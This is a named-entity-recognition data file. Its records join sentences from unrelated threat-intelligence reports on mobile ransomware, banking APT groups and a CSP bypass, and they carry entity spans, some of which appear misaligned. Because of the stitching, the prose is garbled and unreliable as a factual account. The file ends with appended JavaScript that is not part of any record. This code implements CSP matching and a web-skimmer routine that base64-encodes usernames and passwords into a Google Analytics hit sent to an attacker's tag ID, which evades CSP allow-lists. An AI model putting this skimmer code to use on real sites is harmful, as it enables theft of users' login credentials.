and % HiddenKey% as part of its persistence via the Windows registry.[6 ] OSX / Shlayer has used the mktemp utility to make random and unique filenames for payloads , such as export tmpDir=\"$(mktemp -d /tmp / XXXXXXXXXXXX ) \" or mktemp -t Installer .", "spans": [{"start": 150, "end": 163, "label": "Organization"}, {"start": 196, "end": 201, "label": "Organization"}, {"start": 204, "end": 212, "label": "Organization"}, {"start": 511, "end": 515, "label": "Organization"}, {"start": 606, "end": 619, "label": "System"}, {"start": 707, "end": 753, "label": "Indicator"}]} {"text": "Users should adopt best practices , while organizations should ensure that they balance the need for mobility and the importance of security . In August 2017 , the National Bank of Ukraine warned state-owned and private banks across the country about a large-scale phishing attack . The link between these threat actors and FIN7 is still weak , but we decided to disclose a few hints regarding these in this blog post . Tarrask is able to create \" hidden \" scheduled tasks by deleting the Security Descriptor ( SD ) registry value.[9 ] WarzoneRAT can masquerade the Process Environment Block on a compromised host to hide it 's attempts to elevate privileges through IFileOperation .", "spans": [{"start": 164, "end": 177, "label": "Organization"}, {"start": 212, "end": 225, "label": "Organization"}, {"start": 324, "end": 328, "label": "Organization"}, {"start": 420, "end": 427, "label": "System"}, {"start": 536, "end": 546, "label": "Malware"}]} {"text": "End users and enterprises can also benefit from multilayered mobile security solutions such as Trend Micro\u2122 Mobile Security\u2122 . The threat actor used an exploit from the arsenal of the state-sponsored hacker group APT28 . In his history , FIN7 has overlapped several times with Cobalt S-MAL/EmpireMonkey in terms of TTPs . 
This type of attack technique can not be easily mitigated with preventive controls since it is based on the abuse of system features .", "spans": [{"start": 95, "end": 107, "label": "Organization"}, {"start": 213, "end": 218, "label": "Organization"}, {"start": 238, "end": 242, "label": "Organization"}, {"start": 277, "end": 302, "label": "Malware"}]} {"text": "Trend Micro\u2122 Mobile Security for Enterprise provides device , compliance and application management , data protection , and configuration provisioning , as well as protects devices from attacks that exploit vulnerabilities , preventing unauthorized access to apps , and detecting and blocking malware and fraudulent websites . The new threat actor group was eventually named Silence . This activity cluster , which Kaspersky Lab has followed for a few years , uses various implants for targeting mainly banks , and developers of banking and money processing software solutions . for third - party application logging , messaging , and/or other artifacts that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 13, "end": 43, "label": "System"}]} {"text": "Trend Micro \u2019 s Mobile App Reputation Service ( MARS ) covers Android and iOS threats using leading sandbox and machine learning technologies , protecting devices against malware , zero-day and known exploits , privacy leaks , and application vulnerabilities . Silence is a group of Russian-speaking hackers , based on their commands language , the location of infrastructure they used , and the geography of their targets ( Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan ) . At the end of 2018 , the cluster started to use not only CobaltStrike but also Powershell Empire in order to gain a foothold on the victims\u2019 networks . 
Monitor executed commands and arguments that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 16, "end": 45, "label": "System"}, {"start": 62, "end": 69, "label": "System"}, {"start": 74, "end": 77, "label": "System"}, {"start": 552, "end": 564, "label": "System"}, {"start": 574, "end": 584, "label": "System"}, {"start": 585, "end": 591, "label": "System"}]} {"text": "Several weeks ago , Check Point Mobile Threat Prevention detected and quarantined the Android device of an unsuspecting customer employee who downloaded and installed a 0day mobile ransomware from Google Play dubbed \u201c Charger. \u201d This incident demonstrates how malware can be a dangerous threat to your business , and how advanced behavioral detection fills mobile security gaps attackers use to penetrate entire networks . Although Silence 's phishing emails were also sent to bank employees in Central and Western Europe , Africa , and Asia ) . After a successful penetration , it uses its own backdoors and the CobaltStrike framework or Powershell Empire components to hop to interesting parts of the network , where it can monetize its access . Monitor for newly constructed files that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 20, "end": 31, "label": "Organization"}, {"start": 86, "end": 93, "label": "System"}, {"start": 197, "end": 208, "label": "System"}, {"start": 218, "end": 226, "label": "Malware"}, {"start": 477, "end": 491, "label": "Organization"}, {"start": 613, "end": 625, "label": "System"}, {"start": 639, "end": 649, "label": "System"}, {"start": 650, "end": 656, "label": "System"}]} {"text": "Charger was found embedded in an app called EnergyRescue . Silence also used Russian-language web hosting services . FIN7 \u2019s last campaigns were targeting banks in Europe and Central America . 
Monitor for contextual data about a file , which may include information such as name , the content ( ex : signature , headers , or data / media ) , user / owner , permissions that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 44, "end": 56, "label": "Malware"}, {"start": 94, "end": 114, "label": "System"}, {"start": 117, "end": 121, "label": "Organization"}]} {"text": "The infected app steals contacts and SMS messages from the user \u2019 s device and asks for admin permissions . Financially motivated APT groups which focus efforts on targeted attacks on the financial sector such as \u2014 Anunak , Corkow , Buhtrap \u2014 usually managed botnets using developed or modified banking Trojans . This threat actor is suspected of stealing \u20ac13 million from Bank of Valetta , Malta earlier this year . Monitor for changes made to files that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 188, "end": 204, "label": "Organization"}, {"start": 224, "end": 230, "label": "System"}, {"start": 295, "end": 302, "label": "Organization"}]} {"text": "If granted , the ransomware locks the device and displays a message demanding payment : You need to pay for us , otherwise we will sell portion of your personal information on black market every 30 minutes . They tried new techniques to steal from banking systems , including AWS CBR ( the Russian Central Bank 's Automated Workstation Client ) , ATMs , and card processing . A few interesting overlaps in recent FIN7 campaigns : Both used macros to copy wscript.exe to another file , which began with \u201c ms \u201d ( mses.exe \u2013 FIN7 , msutil.exe \u2013 EmpireMonkey ) . 
Monitor for changes made to firewall rules for unexpected modifications to allow / block specific network traffic that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 298, "end": 342, "label": "Organization"}, {"start": 347, "end": 351, "label": "Organization"}, {"start": 413, "end": 417, "label": "Organization"}, {"start": 440, "end": 446, "label": "System"}, {"start": 455, "end": 466, "label": "Indicator"}, {"start": 511, "end": 519, "label": "Indicator"}, {"start": 522, "end": 526, "label": "Organization"}, {"start": 529, "end": 539, "label": "Indicator"}, {"start": 542, "end": 554, "label": "Malware"}]} {"text": "WE GIVE 100 % GUARANTEE THAT ALL FILES WILL RESTORE AFTER WE RECEIVE PAYMENT . Group-IB researchers were tracking Silence throughout this period and conducting response following incidents in the financial sector . Both executed a JScript file named \u201c error \u201d in %TEMP% ( Errors.txt in the case of FIN7 , Errors.bat for EmpireMonkey ) . Monitor for API calls that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 79, "end": 87, "label": "Organization"}, {"start": 196, "end": 212, "label": "Organization"}, {"start": 231, "end": 238, "label": "System"}, {"start": 272, "end": 282, "label": "Indicator"}, {"start": 298, "end": 302, "label": "Organization"}, {"start": 305, "end": 315, "label": "Indicator"}, {"start": 320, "end": 332, "label": "Malware"}]} {"text": "WE WILL UNLOCK THE MOBILE DEVICE AND DELETE ALL YOUR DATA FROM OUR SERVER ! Group-IB detected the first incidents relating to Silence in June 2016 . Both used DocuSign decoy documents with different macros . 
Monitor newly executed processes that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 76, "end": 84, "label": "Organization"}, {"start": 159, "end": 167, "label": "System"}, {"start": 199, "end": 205, "label": "System"}]} {"text": "TURNING OFF YOUR PHONE IS MEANINGLESS , ALL YOUR DATA IS ALREADY STORED ON OUR SERVERS ! One of Silence 's first targets was a Russian bank , when they tried to attack AWS CBR . The macros popped the same \u201c Document decryption error \u201d error message\u2014even if macro code remains totally different . Any attempts to enable scripts running on a system would be considered suspicious .", "spans": [{"start": 135, "end": 139, "label": "Organization"}, {"start": 182, "end": 188, "label": "System"}, {"start": 257, "end": 262, "label": "System"}]} {"text": "WE STILL CAN SELLING IT FOR SPAM , FAKE , BANK CRIME etc\u2026 We collect and download all of your personal data . They are selective in their attacks and wait for about three months between incidents , which is approximately three times longer than other financially motivated APT groups , like MoneyTaker , Anunak ( Carbanak ) , Buhtrap or Cobalt . We have a high level of confidence in a historic association between FIN7 and Cobalt , even though we believe that these two clusters of activity are operated by different teams . If scripts are not commonly used on a system , but enabled , scripts running out of cycle from patching or other administrator functions are suspicious .", "spans": [{"start": 415, "end": 419, "label": "Organization"}, {"start": 424, "end": 430, "label": "Malware"}]} {"text": "All information about your social networks , Bank accounts , Credit Cards . Silence try to apply new techniques and ways of stealing from various banking systems , including AWS CBR , ATMs , and card processing . 
AveMaria is a new botnet , whose first version we found in September 2018 , right after the arrests of the FIN7 members . Scripts should be captured from the file system when possible to determine their actions and intent .", "spans": [{"start": 213, "end": 221, "label": "Malware"}, {"start": 320, "end": 324, "label": "Organization"}]} {"text": "We collect all data about your friends and family . Silence 's successful attacks currently have been limited to the CIS and Eastern European countries . We have medium confidence that this botnet falls under the FIN7 umbrella . Monitor for newly constructed services / daemons that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 213, "end": 217, "label": "Organization"}]} {"text": "The ransom demand for 0.2 Bitcoins ( roughly $ 180 ) is a much higher ransom demand than has been seen in mobile ransomware so far . He is responsible for developing tools for conducting attacks and is also able to modify complex exploits and third party software . In fact , AveMaria is a classic infostealer bot that collects all possible credentials from various types of software : browsers , email clients , messengers , etc. , and can act as a keylogger . Monitor for newly constructed user accounts that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 155, "end": 171, "label": "Malware"}, {"start": 215, "end": 238, "label": "Malware"}, {"start": 243, "end": 263, "label": "Malware"}, {"start": 276, "end": 284, "label": "Malware"}, {"start": 397, "end": 402, "label": "System"}]} {"text": "By comparison , the DataLust ransomware demanded merely $ 15 . Silence 's main targets are located in Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan . Since the beginning of 2019 , we have collected more than 1300 samples and extracted more than 130 C2s . 
Monitor for contextual data about an account , which may include a username , user ID , environmental data that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 20, "end": 28, "label": "Malware"}]} {"text": "Payments are made to a specific Bitcoin account , but we haven \u2019 t identified any payments so far . However , some phishing emails were sent to bank employees in more than 25 countries of Central and Western Europe , Africa and Asia including : Kyrgyzstan , Armenia , Georgia , Serbia , Germany , Latvia , Czech Republic , Romania , Kenya , Israel , Cyprus , Greece , Turkey , Taiwan , Malaysia , Switzerland , Vietnam , Austria , Uzbekistan , Great Britain , Hong Kong , and others . To deliver their malware , the cyber criminals use spearphishing emails with various types of attachments : MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882 , or documents with Ole2Link and SCT . Monitor for changes made to windows registry keys and/or values that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 32, "end": 39, "label": "System"}, {"start": 144, "end": 158, "label": "Organization"}, {"start": 550, "end": 556, "label": "System"}, {"start": 593, "end": 595, "label": "Organization"}, {"start": 596, "end": 602, "label": "System"}, {"start": 675, "end": 689, "label": "Vulnerability"}, {"start": 710, "end": 718, "label": "Vulnerability"}, {"start": 723, "end": 726, "label": "Vulnerability"}]} {"text": "Adware commonly found on Play collects profits from ad networks , but mobile ransomware inflicts direct harm to users . In the same year , they conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans . They also use AutoIT droppers , password-protected EXE files and even ISO images . 
CSP can define a list of domains that the browser should be allowed to interact with for the visited URL .", "spans": [{"start": 177, "end": 189, "label": "System"}, {"start": 194, "end": 210, "label": "System"}, {"start": 246, "end": 252, "label": "System"}, {"start": 283, "end": 286, "label": "System"}, {"start": 302, "end": 305, "label": "System"}, {"start": 315, "end": 318, "label": "System"}]} {"text": "Like FakeDefender and DataLust , Charger could be an indicator of a wider effort by mobile malware developers to catch up with their PC ransomware cousins . In the same year , Silence conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans . What is interesting , in some emails , they ask targets to phone them if they have any questions , like the FIN7 guys do . Designed to guard against XSS attacks , CSP helps control which domains can be accessed as part of a page and therefore restricts which domains to share data with .", "spans": [{"start": 5, "end": 17, "label": "Malware"}, {"start": 22, "end": 30, "label": "Malware"}, {"start": 33, "end": 40, "label": "Malware"}, {"start": 217, "end": 229, "label": "System"}, {"start": 234, "end": 250, "label": "System"}, {"start": 302, "end": 308, "label": "System"}, {"start": 380, "end": 384, "label": "Organization"}, {"start": 421, "end": 432, "label": "Organization"}, {"start": 435, "end": 438, "label": "System"}]} {"text": "Similar to other malware seen in the past , Charger checks the local settings of the device and does not run its malicious logic if the device is located in Ukraine , Russia , or Belarus . In two months , the group returned to their proven method and withdrew funds again through ATMs . During the investigation into FIN7 , our threat-hunting systems found an interesting overlap in between the infrastructure of FIN7 and AveMaria . 
It can even restrict forms to be sent only to specific hosts , using the form-action directive .", "spans": [{"start": 44, "end": 51, "label": "Malware"}, {"start": 317, "end": 321, "label": "Organization"}, {"start": 413, "end": 417, "label": "Organization"}, {"start": 422, "end": 430, "label": "Malware"}]} {"text": "This is likely done to keep the developers from being prosecuted in their own countries or being extradited between countries . In September 2017 , we discovered a new targeted attack on financial institutions . Basically , two servers in the same IP range and AS14576 ( autonomous system ) share a non-standard SSH port , which is 222 . These restrictions are specified by a list of allowed URIs .", "spans": [{"start": 187, "end": 209, "label": "Organization"}, {"start": 312, "end": 315, "label": "Indicator"}, {"start": 374, "end": 396, "label": "System"}]} {"text": "Most malware found on Google Play contains only a dropper that later downloads the real malicious components to the device . In September 2017 , we discovered Silence attack on financial institutions . One of the servers is a Griffon C2, and the other one , an AveMaria C2 . By analyzing field data we see a gap in the implementation of CSP , and even for sites that do use it correctly , this creates an open window to exfiltrate data .", "spans": [{"start": 22, "end": 33, "label": "System"}, {"start": 177, "end": 199, "label": "Organization"}, {"start": 226, "end": 233, "label": "Malware"}, {"start": 261, "end": 269, "label": "Malware"}, {"start": 270, "end": 272, "label": "System"}, {"start": 306, "end": 340, "label": "Vulnerability"}, {"start": 356, "end": 361, "label": "System"}]} {"text": "Charger , however , uses a heavy packing approach which it harder for the malware to stay hidden , so it must compensate with other means . The infection vector is a spear-phishing email with a malicious attachment . 
Distribution of targets is another factor suggesting that these two malware families may be connected . Our demonstration shows how using the Google Analytics API , a web skimmer can send data to be collected in his own account instance .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 359, "end": 379, "label": "System"}, {"start": 382, "end": 395, "label": "Organization"}]} {"text": "The developers of Charger gave it everything they had to boost its evasion capabilities and so it could stay hidden on Google Play for as long as possible . An interesting point in the Silence attack is that the cybercriminals had already compromised banking infrastructure in order to send their spear-phishing emails from the addresses of real bank employees and look as unsuspicious as possible to future victims . We analyzed AveMaria targets during February and March of 2019 . As Google Analytics is allowed in the CSP configuration of many major sites , this demo shows how an attacker can bypass this security protection and steal data .", "spans": [{"start": 18, "end": 25, "label": "Malware"}, {"start": 119, "end": 130, "label": "System"}, {"start": 251, "end": 258, "label": "Organization"}, {"start": 346, "end": 360, "label": "Organization"}, {"start": 430, "end": 438, "label": "Malware"}, {"start": 486, "end": 502, "label": "System"}, {"start": 521, "end": 524, "label": "System"}, {"start": 584, "end": 592, "label": "Organization"}]} {"text": "The malware uses several advanced techniques to hide its real intentions and makes it harder to detect . The spear-phishing infection vector is still the most popular way to initiate targeted campaigns . The spearphishing emails were sent to various kinds of businesses only and did not target individuals . 
Our gathered field data shows the following statistics on CSP usage across the Internet ( based on HTTPArchive March 2020 scan ):", "spans": [{"start": 222, "end": 228, "label": "System"}, {"start": 366, "end": 369, "label": "System"}, {"start": 387, "end": 395, "label": "System"}, {"start": 407, "end": 418, "label": "System"}]} {"text": "It encodes strings into binary arrays , making it hard to inspect them . We conclude that the actor behind the attack is Silence group , a relatively new threat actor that's been operating since mid-2016 . Thirty percent of the targets were small and medium-sized companies that were suppliers or service providers for bigger players and 21% were various types of manufacturing companies . Looking at the top 3 M domains , only 210 K use CSP .", "spans": [{"start": 438, "end": 441, "label": "System"}]} {"text": "It loads code from encrypted resources dynamically , which most detection engines can not penetrate and inspect . A preliminary analysis caught the attention of our Threat Analysis and Intelligence team as it yielded interesting data that , among other things , shows that Silence was targeting employees from financial entities , specifically in the Russian Federation and the Republic of Belarus . We also spotted several typical FIN7 targets , such as retailers and hotels . Most do n\u2019t even do much besides Since the most common allowed domain is google-analytics.com ( 17 K websites )", "spans": [{"start": 295, "end": 304, "label": "Organization"}, {"start": 310, "end": 328, "label": "Organization"}, {"start": 432, "end": 436, "label": "Organization"}, {"start": 551, "end": 571, "label": "Indicator"}]} {"text": "The dynamically-loaded code is also flooded with meaningless commands that mask the actual commands passing through . As shown above , the threat runs several native binaries to collect useful information for its recon phase . Most AveMaria targets ( 72% ) were in the EU . 
We took google - analytics as an example , but other services can also be used .", "spans": [{"start": 159, "end": 174, "label": "System"}, {"start": 232, "end": 240, "label": "Malware"}, {"start": 269, "end": 271, "label": "Organization"}, {"start": 282, "end": 300, "label": "System"}]} {"text": "It checks whether it is being run in an emulator before it starts its malicious activity . The intelligence we have collected shows that Silence is part of a more extensive operation , still focused on financial institutions operating mainly on Russian territory . At the end of 2018 , while searching for new FIN7 campaigns via telemetry , we discovered a set of activity that we temporarily called \u201c CopyPaste \u201d from a previously unknown APT . As an example , we took the twitter login page , which implemented the following CSP rule ( which contains ): The following short JS code inserted into the site will send the credentials to google - analytics console controlled by us : The UA-#######- # parameter is the tag ID owner that Google Analytics uses to connect the data to a specific account .", "spans": [{"start": 202, "end": 224, "label": "Organization"}, {"start": 310, "end": 314, "label": "Organization"}, {"start": 402, "end": 411, "label": "Organization"}, {"start": 527, "end": 530, "label": "System"}, {"start": 735, "end": 751, "label": "System"}]} {"text": "PC malware first introduced this technique which is becoming a trend in mobile malware having been adopted by several malware families including Dendroid . These spearphishing attempts represent an evolution of Iranian actors based on their social engineering tactics and narrow targeting . Interestingly , this actor targeted financial entities and companies in one African country , which lead us to think that CopyPaste was associated with cybermercenaries or a training center . 
Instead of using twitter \u2019s google - analytic account , we used an account we control .", "spans": [{"start": 145, "end": 153, "label": "Malware"}, {"start": 413, "end": 422, "label": "Organization"}, {"start": 500, "end": 536, "label": "System"}]} {"text": "Emulator and location conditions for the malware \u2019 s activity Check Point Mobile Threat Prevention customers are protected from Charger and similar malware . Based on file modification dates and timestamps of samples , it appears that the observed campaign was initiated in the middle of February 2016 , with the infrastructure taken offline at the start of March . This set of activity relied on open-source tools , such as Powershell Empire , and well-documented red teaming techniques , in order to get a foothold within the victim\u2019s networks and avoid detection . Unfortunately , the CSP policy ca n\u2019t discriminate based on the Tag ID .", "spans": [{"start": 62, "end": 73, "label": "Organization"}, {"start": 128, "end": 135, "label": "Malware"}, {"start": 425, "end": 435, "label": "System"}, {"start": 436, "end": 442, "label": "System"}, {"start": 588, "end": 591, "label": "System"}]} {"text": "Check Point \u2019 s Analysis and Response Team ( ART ) disclosed the finding to Android \u2019 s Security team who took the appropriate security steps to remove the infected app and added the malware to Android \u2019 s built-in protection mechanisms . While the Sima moniker could similarly originate from software labels , it is a common female Persian name and a Persian-language word for \" visage \" or \" appearance \" . The links between CopyPaste and FIN7 are still very weak . 
Though Google meant to have this parameter be used to mention the page the user visited , we used it to exfiltrate the user name and password data encoded in base64 .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 76, "end": 83, "label": "System"}, {"start": 194, "end": 201, "label": "System"}, {"start": 427, "end": 436, "label": "Organization"}, {"start": 441, "end": 445, "label": "Organization"}, {"start": 475, "end": 481, "label": "Organization"}, {"start": 626, "end": 632, "label": "Indicator"}]} {"text": "Charger SHA256 hash : 58eb6c368e129b17559bdeacb3aed4d9a5d3596f774cf5ed3fdcf51775232ba0 Infostealer , Keylogger , and Ransomware in One : Anubis Targets More than 250 Android Applications October 29 , 2021 The Cofense Phishing Defense Center uncovered a phishing campaign that specifically targets users of Android devices that could result in compromise if unsigned Android applications are permitted on the device . Given its use in more advanced social engineering campaigns against women 's rights activists , the label seem particularly apt . It is possible that the CopyPaste operators were influenced by open-source publications and do not have any ties with FIN7 . 
In our Google Analytics platform , we will see the data as : In our demo the DP will result in page view of Which will be decoded from base64 as : The source of the problem is that the CSP rule system is n\u2019t granular enough .", "spans": [{"start": 22, "end": 86, "label": "Indicator"}, {"start": 137, "end": 143, "label": "Malware"}, {"start": 166, "end": 173, "label": "System"}, {"start": 209, "end": 240, "label": "Organization"}, {"start": 306, "end": 313, "label": "System"}, {"start": 366, "end": 373, "label": "System"}, {"start": 448, "end": 476, "label": "Organization"}, {"start": 485, "end": 510, "label": "Organization"}, {"start": 571, "end": 580, "label": "Organization"}, {"start": 665, "end": 669, "label": "Organization"}, {"start": 679, "end": 704, "label": "System"}, {"start": 807, "end": 813, "label": "Indicator"}, {"start": 857, "end": 872, "label": "System"}]} {"text": "The campaign seeks to deliver Anubis , a particularly nasty piece of malware that was originally used for cyber espionage and retooled as a banking trojan . Samples and resource names contained the family names of prominent Iranians , and several of these individuals received the malware located in their respective folder . During 2018 , Europol and DoJ announced the arrest of the leader of the FIN7 and Carbanak S-APT/CobaltGoblin cybercrime groups . 
Recognizing and stopping the above malicious JavaScript request requires advanced visibility solutions that can detect the access and exfiltration of sensitive user data ( in this case the user \u2019s email address and password ) .", "spans": [{"start": 30, "end": 36, "label": "Malware"}, {"start": 224, "end": 232, "label": "Organization"}, {"start": 340, "end": 347, "label": "Organization"}, {"start": 352, "end": 355, "label": "Organization"}, {"start": 398, "end": 402, "label": "Organization"}, {"start": 407, "end": 434, "label": "Organization"}]} {"text": "Anubis can completely hijack an Android mobile device , steal data , record phone calls , and even hold the device to ransom by encrypting the victim \u2019 s personal files . The Sima group also engaged in impersonation of Citizenship and Immigration Services at the Department of Homeland Security , posing as a notice about the expiration of the recipient 's Permanent Residence status . It was believed that the arrest of the group leader will have an impact on the group\u2019s operations . One might think we could have updated the CSP to only allow specific TIDs : .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 32, "end": 39, "label": "System"}, {"start": 175, "end": 179, "label": "Organization"}, {"start": 219, "end": 230, "label": "Organization"}, {"start": 235, "end": 255, "label": "Organization"}, {"start": 263, "end": 294, "label": "Organization"}, {"start": 528, "end": 531, "label": "System"}]} {"text": "With mobile devices increasingly used in the corporate environment , thanks to the popularity of BYOD policies , this malware has the potential to cause serious harm , mostly to consumers , and businesses that allow the installation of unsigned applications . 
In another case , Sima mirrored an announcement made about the broadcast of a television program on Iranian-American cultural affairs in order to impersonate the individual and engage in spearphishing within hours of the legitimate message . However , recent data seems to indicate that the attacks have continued without significant drawbacks . The problem is that CSP does n't support query strings ( See Spec ):", "spans": [{"start": 278, "end": 282, "label": "Organization"}, {"start": 626, "end": 629, "label": "System"}]} {"text": "Here \u2019 s how it works : At first glance , the email shown in Figure 1 looks like any other phishing email that asks the user to download an invoice . The server used to host these malware samples was located on the German provider Hetzner ( 148.251.55.114 ) , within a small block of IP addresses that are registered with the customer ID \" HOS-156205 \" . One may say CobaltGoblin and FIN7 have even extended the number of groups operating under their umbrella . Having such a gap with the most commonly used domain allowed with CSP is a major risk indicator of the threats that can come from other domains that are used to serve multiple accounts .", "spans": [{"start": 222, "end": 230, "label": "Organization"}, {"start": 367, "end": 379, "label": "Organization"}, {"start": 384, "end": 388, "label": "Organization"}, {"start": 528, "end": 531, "label": "System"}, {"start": 532, "end": 646, "label": "Indicator"}]} {"text": "However , this particular email downloads an Android Package Kit ( APK ) , which is the common format used by Android to distribute and install applications . All the samples appear to be have been compiled between February 29 and March 1 2016 , shortly before our discovery , suggesting that , despite the known C&C servers having quickly gone offline shortly after , this spree of attacks might be fresh and currently undergoing . 
We observe , with various levels of confidence , that there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks . A possible solution would come from adaptive URLs , adding the ID as part of the URL or subdomain to allow admins to set CSP rules that restrict data exfiltration to other accounts .", "spans": [{"start": 45, "end": 64, "label": "System"}, {"start": 110, "end": 117, "label": "System"}]} {"text": "Let \u2019 s take a closer look at the suspicious file . These archives provide further indication that those entities behind the campaigns are Persian-language speakers , due to the naming of files and folders in Persian . The first of them is the well-known FIN7 , which specializes in attacking various companies to get access to financial data or PoS infrastructure . A more granular future direction for strengthening CSP , to be considered as part of the CSP standard , is XHR proxy enforcement .", "spans": [{"start": 255, "end": 259, "label": "Organization"}, {"start": 346, "end": 349, "label": "System"}]} {"text": "Figure 1 \u2013 Phishing Email When the email link is opened from an Android device , an APK file ( Fattura002873.apk ) , is downloaded . For the sake of narrative we are going to focus exclusively to those samples we identified being used in attacks against Iranian civil society and diaspora . They rely on a Griffon JS backdoor and Cobalt S-MAL/Meterpreter , and in recent attacks , Powershell Empire . 
This will essentially create a client-side WAF that can enforce a policy on where specific data fields are allowed to be transmitted .", "spans": [{"start": 64, "end": 71, "label": "System"}, {"start": 95, "end": 112, "label": "Indicator"}, {"start": 262, "end": 275, "label": "Organization"}, {"start": 280, "end": 288, "label": "Organization"}, {"start": 306, "end": 313, "label": "Malware"}, {"start": 314, "end": 316, "label": "System"}, {"start": 330, "end": 354, "label": "System"}, {"start": 381, "end": 391, "label": "System"}, {"start": 392, "end": 398, "label": "System"}]} {"text": "Upon opening the file , the user is asked to enable \u201c Google Play Protect \u201d as shown in Figure 2 . Butterfly has attacked multi-billion dollar companies operating in the internet , IT software , pharmaceutical , and commodities sectors . The second one is CobaltGoblin S-APT/Carbanak S-APT/EmpireMonkey , which uses the same toolkit , techniques and similar infrastructure but targets only financial institutions and associated software/services providers . In addition to the complexity of managing CSP rules , this vulnerability shows how widely used services such as Google Analytics can be subverted to bypass this protection .", "spans": [{"start": 54, "end": 65, "label": "System"}, {"start": 99, "end": 108, "label": "Organization"}, {"start": 122, "end": 152, "label": "Organization"}, {"start": 195, "end": 209, "label": "Organization"}, {"start": 216, "end": 235, "label": "Organization"}, {"start": 256, "end": 302, "label": "Organization"}, {"start": 473, "end": 509, "label": "Vulnerability"}, {"start": 517, "end": 530, "label": "Vulnerability"}, {"start": 570, "end": 586, "label": "System"}]} {"text": "However , this is not a genuine \u201c Google Play Protect \u201d screen ; instead it gives the app all the permissions it needs while simultaneously disabling the actual Google Play Protect . 
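Worked example for the Google Analytics CSP bypass discussed above. It is added here and is not code from the original research or from any of the reports quoted on this page; the policy, site origin, tag IDs, credentials and the path-scoped "adaptive URL" collector are all constructed. The matcher follows the CSP3 host-source rules (scheme, host, port, path) in simplified form, without redirect, nonce or hash handling, and deliberately mirrors browser behaviour in ignoring the query component of both the request and the source expression: that is what lets a skimmer hit carrying an attacker-controlled tid and base64-encoded credentials in dl pass a policy that allow-lists www.google-analytics.com.

```javascript
// Added example: simplified CSP3 host-source matching, used to show why an
// analytics host allow-listed by hostname cannot tell the site's own account
// from an attacker's. Policy, origin, tag IDs, credentials and the "adaptive
// URL" collector are constructed for illustration. Runs on Node (uses URL, Buffer).

const DEFAULT_PORTS = { 'http:': '80', 'https:': '443', 'ws:': '80', 'wss:': '443' };

// "directive src src; directive src" -> Map(directive -> [source expressions])
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name && !policy.has(name.toLowerCase())) policy.set(name.toLowerCase(), sources);
  }
  return policy;
}

// Path-part comparison: a trailing "/" means prefix match on whole path
// segments, otherwise the paths must be identical; no path means the whole host.
function pathMatches(exprPath, urlPath) {
  if (!exprPath) return true;
  const want = exprPath.split('/');
  const have = urlPath.split('/');
  if (exprPath.endsWith('/')) {
    want.pop();
    return want.every((seg, i) => have[i] === seg);
  }
  return want.length === have.length && want.every((seg, i) => have[i] === seg);
}

// Does one source expression match a URL? 'self', scheme-sources and
// host-sources ([scheme://]host[:port][/path]) are handled; nonces, hashes and
// redirects are out of scope. The query string is never consulted: CSP matches
// scheme, host, port and path only, and a query written into a source
// expression is dropped (Chrome warns that it "will be ignored").
function sourceMatches(expr, url, selfOrigin) {
  const u = new URL(url);
  const self = new URL(selfOrigin);
  if (expr === "'self'") return u.origin === self.origin;
  if (expr.startsWith("'")) return false;
  if (/^[a-z][a-z0-9+.-]*:$/i.test(expr)) return u.protocol === expr.toLowerCase();
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*|(?:\*\.)?[^\/:*]+)(?::(\d+|\*))?(\/.*)?$/i
    .exec(expr.replace(/[?#].*$/, ''));
  if (!m) return false;
  const [, scheme, host, port, path] = m;
  const wantScheme = scheme ? scheme.toLowerCase() + ':' : self.protocol;
  if (u.protocol !== wantScheme && !(wantScheme === 'http:' && u.protocol === 'https:')) return false;
  const h = host.toLowerCase();
  if (h.startsWith('*.')) { if (!u.hostname.endsWith(h.slice(1))) return false; }
  else if (h !== '*' && h !== u.hostname) return false;
  const urlPort = u.port || DEFAULT_PORTS[u.protocol] || '';
  if (port === undefined) { if (urlPort !== (DEFAULT_PORTS[wantScheme] || '')) return false; }
  else if (port !== '*' && port !== urlPort) return false;
  return pathMatches(path || '', u.pathname);
}

// Would this policy let the page reach url under `directive`? Falls back to default-src.
function cspAllows(policy, directive, url, selfOrigin) {
  const sources = policy.get(directive) || policy.get('default-src');
  if (!sources) return true; // directive unset: unrestricted
  return sources.some((s) => sourceMatches(s, url, selfOrigin));
}

// Measurement-Protocol-style hit: account (tid) and document location (dl)
// both travel in the query string, which CSP cannot see.
function buildGaHit(tid, documentLocation) {
  const hit = new URL('https://www.google-analytics.com/collect');
  hit.search = new URLSearchParams({ v: '1', tid, cid: '555', t: 'pageview', dl: documentLocation }).toString();
  return hit.toString();
}

// Skimmer side: smuggle credentials in dl, base64-encoded, to the attacker's tid.
function skimmerHit(attackerTid, username, password) {
  const blob = Buffer.from(JSON.stringify({ username, password })).toString('base64');
  return buildGaHit(attackerTid, blob);
}

// What the attacker reads back in their own analytics property.
function decodeSkimmedHit(hitUrl) {
  const q = new URL(hitUrl).searchParams;
  return { tid: q.get('tid'), data: JSON.parse(Buffer.from(q.get('dl'), 'base64').toString('utf8')) };
}

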